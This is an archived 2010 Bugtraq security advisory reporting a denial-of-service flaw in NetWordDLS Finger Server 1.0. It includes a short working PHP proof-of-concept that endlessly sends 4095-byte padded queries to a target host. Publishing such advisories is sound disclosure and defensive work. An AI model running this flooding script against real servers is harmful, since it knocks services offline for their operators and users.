| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <AANLkTimF=4oGf=Xdkituw_afxJO0PYKymCdy3o627K_U@mail.gmail.com>
Date: Mon, 2 Aug 2010 18:03:55 -0300
From: Ewerson GuimarĂ£es (Crash) - Dclabs <crash@...abs.com.br>
To: bugtraq@...urityfocus.com, dclabs@...abs.com.br
Subject: [DCA-0009] - NetWordDLS Finger Server Denial of Service
[DCA-0009 - NetWordDLS Finger Server Denial of Service]
[Software]
- NetWordDLS Finger Server
[Vendor Product Description]
- A windows server application that reports back to users the machine
name and the current logged on user
[Bug Description]
- Server does not validate the input size leading to a Denial Of
Service flaw while sending more than 4095 characters to it.
[History]
- Advisory sent to vendor on 06/20/2010.
- No vendor response
- Advisory publised on 08/01/2010
[Impact]
- Low
[Affected Version]
- Finger Server 1.0
- Prior versions may also be vulnerable
[Vendor Reply]
[Codes]
<?php
require_once 'PEAR.php';
require_once 'Net/Socket.php';
require_once 'Net/Finger.php';
$server = $argv[1];
while (1==1) {
$data = Net_Finger::query( $server, $a = str_repeat("\x90",4095)) ;
echo $data ;
}
?>
----------------------------------------------------------------------------------------
[Credits]
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs Security Team
www.dclabs.com.br
[Greetz]
ipax and all DcLabs members.
Powered by blists - more mailing lists